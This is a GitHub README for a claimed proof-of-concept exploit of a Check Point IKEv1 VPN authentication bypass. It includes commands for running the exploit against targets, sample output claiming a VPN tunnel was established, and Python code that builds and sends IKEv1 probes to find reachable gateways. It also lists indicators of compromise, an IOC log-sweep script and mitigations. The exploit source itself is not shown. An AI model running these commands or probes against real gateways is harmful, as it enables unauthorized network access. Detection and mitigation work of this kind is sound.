fevar54/CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

GitHub: fevar54/CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

PoC exploit and detection tooling for the critical Check Point IKEv1 authentication bypass vulnerability, including vulnerability probing, authentication bypass exploitation, and intrusion detection indicators.

Stars: 1 | Forks: 2

# CVE-2026-50751 - Check Point IKEv1 Authentication Bypass Exploit

[![Security rating](https://img.shields.io/badge/Security-Critical-red)](https://nvd.nist.gov/vuln/detail/CVE-2026-50751) [![CVSS](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2026-50751) [![CISA KEV](https://img.shields.io/badge/CISA%20KEV-2026--06--08-orange)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) [![License](https://img.shields.io/badge/License-GPLv3-blue)](LICENSE) [![Python](https://img.shields.io/badge/Python-3.8+-yellow)](https://www.python.org/)

## ⚠️ Important warning

**This code is for educational purposes and authorized security testing only.** Using it against systems without permission is illegal. The author accepts no responsibility for misuse of this tool.

## 📋 Description

CVE-2026-50751 is a critical authentication bypass in Check Point's handling of the (deprecated) IKEv1 protocol, affecting Remote Access VPN and Mobile Access. An unauthenticated attacker can exploit a flaw in certificate validation to establish a VPN connection without a valid password.

### Technical details

- **Type**: Authentication bypass (CWE-287)
- **CVSS score**: 9.3 (Critical)
- **Vector**: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
- **Actively exploited**: Yes (since 2026-05-07)
- **CISA KEV**: added 2026-06-08, due date 2026-06-11

## 🎯 Affected versions

| Product | Version |
|---------|---------|
| Security Gateways | R80.40 - R82.10 (with IKEv1 enabled) |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | All versions that support IKEv1 |

### Prerequisites

- ✅ VPN Remote Access or Mobile Access enabled
- ✅ IKEv1 enabled for remote access
- ✅ Gateway accepts legacy Remote Access clients
- ✅ Machine certificate not required by the gateway

## 🔧 Installation

```bash
# Clone the repository
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# Install dependencies
pip install -r requirements.txt

# Make the exploit executable
chmod +x exploit.py
```

### 📦 Dependencies

```txt
cryptography>=41.0.0
scapy>=2.5.0
```

## 🚀 Usage

### Detection scan

```bash
# Check whether IKEv1 is enabled
python3 detector.py -t 192.168.1.1 -p 500

# Quick scan
python3 detector.py -t vpn.target.com -p 4500
```

### Exploitation (AUTHORIZED USE ONLY)

```bash
# Run the authentication bypass
python3 exploit.py -t 192.168.1.1 -p 500

# Use a specific interface
python3 exploit.py -t vpn.target.com --interface eth0

# Verbose mode
python3 exploit.py -t 192.168.1.1 -p 500 -v
```

### Expected output

```text
╔═══════════════════════════════════════════════════════════════╗
║   CVE-2026-50751 - Check Point IKEv1 Authentication Bypass    ║
║          Critical VPN Authentication Bypass Exploit           ║
║               CVSS: 9.3 | CISA KEV: 2026-06-08                ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
```

## 🔍 Compromise detection

### Search SmartConsole logs

```text
# Query to detect attacker activity
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
```

Repeat the query for each address in the IOC table below; a "Key Install" event from an address that never belonged to a legitimate remote-access user is the signal to look for.

### Known IOCs

| Type | Value |
|------|-------|
| Attacker IPs | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| Hashes | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |

## 🛡️ Mitigation

### Option 1 - Apply hotfix (RECOMMENDED)

| Version | Hotfix Take | Link |
|---------|-------------|------|
| R82.10 | Take 19 | Download |
| R82 | Take 103 | Download |
| R81.20 | Take 141 | Download |

### Option 2 - Temporary mitigations

1. Disable legacy clients: SmartConsole → Gateway → VPN Clients → Authentication, uncheck "Allow older clients".
2. Force IKEv2 only: Global Properties → Remote Access → VPN Authentication, select "IKEv2 only".
3. Make the machine certificate mandatory: VPN Clients → Authentication → Machine Certificate Authentication, set to "Mandatory".

## 📚 References

- NVD - CVE-2026-50751: https://nvd.nist.gov/vuln/detail/CVE-2026-50751
- Check Point SK185033
- CISA Known Exploited Vulnerabilities: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- Blog post - Check Point Research

## 📊 Timeline

| Date | Event |
|------|-------|
| 2026-05-07 | First exploitation observed |
| 2026-06-04 | Check Point begins investigation |
| 2026-06-08 | CVE published, CISA adds it to KEV |
| 2026-06-11 | CISA patching deadline |

## ⚖️ Disclaimer

This software is provided "as is", without warranty of any kind. The author is not responsible for misuse of this tool. Use it only on systems you own or have explicit authorization to test.

## 📞 Contact

To report bugs or contribute: open an issue on GitHub. Contact: security.research@example.com

## 🌟 Credits

- Check Point Research - for the discovery and analysis
- CISA - for coordination and dissemination
- The security community - for the rapid response

⭐ If this PoC was useful to you, consider starring the repository.

## 📄 LICENSE (GPLv3)

### 📦 requirements.txt

```txt
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
```

⚠️ Important note for GitHub:
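The detection scan above only says that `detector.py` checks whether IKEv1 answers on UDP/500 or UDP/4500. The following is an added example, not the repository's `detector.py`: it builds a generic IKEv1 Main Mode (Identity Protection) first message from the ISAKMP header and SA/Proposal/Transform payload layouts of RFC 2408, and classifies the reply by header fields alone. The transform set (3DES/SHA1/PSK/group 2, RFC 2409 appendix A values), the reply labels and the three sample replies are assumptions made for the example; a Check Point remote-access gateway may answer a PSK proposal with a notify rather than accept it, which is still proof that IKEv1 is listening.

```python
"""Offline IKEv1 probe builder/classifier (added example, not the repo's code)."""
import os
import socket
import struct

# ISAKMP fixed header, RFC 2408 section 3.1 (28 bytes): initiator cookie,
# responder cookie, next payload, version, exchange type, flags, message ID, length
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
NP_NONE, NP_SA, NP_NOTIFY = 0, 1, 11
IKEV1_VERSION = 0x10                      # major 1, minor 0
EXCH_MAIN_MODE, EXCH_INFORMATIONAL = 2, 5
NON_ESP_MARKER = b"\x00" * 4              # RFC 3948 prefix for IKE carried on UDP/4500


def build_sa_payload():
    """SA -> one Proposal -> one Transform. Assumed generic transform:
    3DES-CBC (1=5), SHA1 (2=2), PSK (3=1), DH group 2 (4=2), life 28800 s."""
    attrs = [(1, 5), (2, 2), (3, 1), (4, 2), (11, 1), (12, 28800)]
    attr_bytes = b"".join(struct.pack("!HH", 0x8000 | t, v) for t, v in attrs)  # TV form
    transform = struct.pack("!BBHBBH", NP_NONE, 0, 8 + len(attr_bytes), 1, 1, 0) + attr_bytes
    proposal = struct.pack("!BBHBBBB", NP_NONE, 0, 8 + len(transform), 1, 1, 0, 1) + transform
    return struct.pack("!BBHII", NP_NONE, 0, 12 + len(proposal), 1, 1) + proposal  # DOI=IPsec, SIT_IDENTITY_ONLY


def build_main_mode_probe(init_cookie=None, nat_t=False):
    """First Main Mode message: responder cookie zero, message ID zero, SA payload."""
    init_cookie = init_cookie or os.urandom(8)
    body = build_sa_payload()
    hdr = ISAKMP_HDR.pack(init_cookie, b"\x00" * 8, NP_SA, IKEV1_VERSION,
                          EXCH_MAIN_MODE, 0, 0, ISAKMP_HDR.size + len(body))
    pkt = hdr + body
    return init_cookie, (NON_ESP_MARKER + pkt if nat_t else pkt)


def classify_response(data, init_cookie, nat_t=False):
    """Header-only triage of a reply; labels are this example's own."""
    if nat_t:
        if not data.startswith(NON_ESP_MARKER):
            return "not-ikev1"
        data = data[len(NON_ESP_MARKER):]
    if len(data) < ISAKMP_HDR.size:
        return "not-ikev1"
    icookie, rcookie, np, ver, exch, _flags, _msgid, _length = ISAKMP_HDR.unpack_from(data)
    if icookie != init_cookie or (ver >> 4) != 1:     # not our exchange, or IKEv2 (0x20)
        return "not-ikev1"
    if exch == EXCH_MAIN_MODE and np == NP_SA and rcookie != b"\x00" * 8:
        return "ikev1-main-mode-accepted"            # responder picked a proposal
    if exch == EXCH_INFORMATIONAL and np == NP_NOTIFY:
        return "ikev1-notify"                        # e.g. NO-PROPOSAL-CHOSEN: IKEv1 is up
    return "ikev1-other"


def probe(host, port=500, timeout=3.0):
    """Live probe (network); only run against hosts you are authorized to test."""
    nat_t = port == 4500
    cookie, pkt = build_main_mode_probe(nat_t=nat_t)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(pkt, (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return "no-response"
    return classify_response(data, cookie, nat_t=nat_t)


# Constructed sample replies (not real captures) for the offline checks
SAMPLE_COOKIE = bytes(range(8))
SAMPLE_ACCEPT = ISAKMP_HDR.pack(SAMPLE_COOKIE, b"\x11" * 8, NP_SA, IKEV1_VERSION, EXCH_MAIN_MODE, 0, 0, 28)
SAMPLE_NOTIFY = ISAKMP_HDR.pack(SAMPLE_COOKIE, b"\x00" * 8, NP_NOTIFY, IKEV1_VERSION, EXCH_INFORMATIONAL, 0, 0, 28)
SAMPLE_IKEV2 = ISAKMP_HDR.pack(SAMPLE_COOKIE, b"\x22" * 8, 33, 0x20, 34, 0x20, 0, 28)  # IKE_SA_INIT reply

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 500))
    else:
        for name, reply in (("accept", SAMPLE_ACCEPT), ("notify", SAMPLE_NOTIFY), ("ikev2", SAMPLE_IKEV2)):
            print(name, classify_response(reply, SAMPLE_COOKIE))
```

Run it with no arguments to see the three constructed replies classified offline; with a host and port it sends one UDP datagram and triages whatever comes back. A "notify" result is as useful as an "accepted" one for this CVE's purposes: the prerequisite is simply that the gateway still speaks IKEv1 for remote access.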
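The SmartConsole query in the "Compromise detection" section covers one attacker address at a time. As an added example (not part of the repository), the following sweeps exported log lines for every IP in the README's IOC list at once, first with the same narrow rule as the query (`action:"Key Install"` with an IOC as `src` or `dst`) and then with a broader "any contact with an IOC" pass, plus an MD5 check against the two listed hashes. The semicolon-separated `key=value` line format and the four sample records are constructed for the example and are not real gateway logs; only the IP and hash values come from the page.

```python
"""IOC sweep over constructed Check Point-style log lines (added example)."""
import hashlib

# IOC values as listed in this README
IOC_IPS = {
    "45.77.149.152", "209.182.225.136", "38.60.157.139", "162.33.177.101",
    "45.76.26.42", "144.208.127.155", "38.54.88.201", "38.54.107.167",
    "66.42.99.200", "45.63.104.106", "45.61.136.173",
}
IOC_MD5 = {"52fda5c1b9704544f32ee98d9060e689", "51d39aa39478beeac94f2d12f682ecce"}

# Constructed sample records (not real logs); assumed export format is
# semicolon-separated key=value fields, one record per line.
SAMPLE_LOG = """\
time=2026-06-05T02:14:07Z;action=Key Install;src=45.77.149.152;dst=203.0.113.10;user=svc-backup;product=VPN-1 & FireWall-1
time=2026-06-05T02:15:31Z;action=Key Install;src=198.51.100.7;dst=203.0.113.10;user=alice;product=VPN-1 & FireWall-1
time=2026-06-05T03:01:00Z;action=Accept;src=38.54.88.201;dst=203.0.113.10;service=500;product=VPN-1 & FireWall-1
time=2026-06-06T11:22:09Z;action=Key Install;src=203.0.113.10;dst=209.182.225.136;user=;product=VPN-1 & FireWall-1
"""


def parse_record(line):
    """Split 'k=v;k=v' into a dict; fields without '=' are ignored."""
    fields = (f.split("=", 1) for f in line.strip().split(";") if "=" in f)
    return {k.strip(): v.strip() for k, v in fields}


def key_install_hits(log_text, iocs=IOC_IPS):
    """Same rule as the SmartConsole query, applied to every IOC at once:
    action is "Key Install" and src or dst is an IOC address.
    Returns (time, matched IOC, user) tuples in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("action") != "Key Install":
            continue
        peers = {rec.get("src"), rec.get("dst")} & iocs
        if peers:
            hits.append((rec.get("time"), sorted(peers)[0], rec.get("user", "")))
    return hits


def any_ioc_contact(log_text, iocs=IOC_IPS):
    """Broader pass: every record touching an IOC address, regardless of action.
    Useful for spotting IKE probing (e.g. Accept on udp/500) before a Key Install."""
    return [
        (rec.get("time"), rec.get("action"))
        for rec in map(parse_record, log_text.splitlines())
        if {rec.get("src"), rec.get("dst")} & iocs
    ]


def md5_is_ioc(blob):
    """True if the MD5 of the given file contents is one of the listed hashes."""
    return hashlib.md5(blob).hexdigest() in IOC_MD5


if __name__ == "__main__":
    for hit in key_install_hits(SAMPLE_LOG):
        print("Key Install from IOC:", hit)
    for contact in any_ioc_contact(SAMPLE_LOG):
        print("IOC contact:", contact)
```

Against the constructed sample, the narrow rule flags the two "Key Install" records involving IOC addresses (the second legitimate-looking login from 198.51.100.7 is left alone), while the broad pass also surfaces the earlier `Accept` from 38.54.88.201 on udp/500, which is the kind of pre-exploitation contact worth pulling into a timeline.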
Tags: Check Point, CISA project, Python, VPN, no backdoor, authentication bypass, reverse engineering tool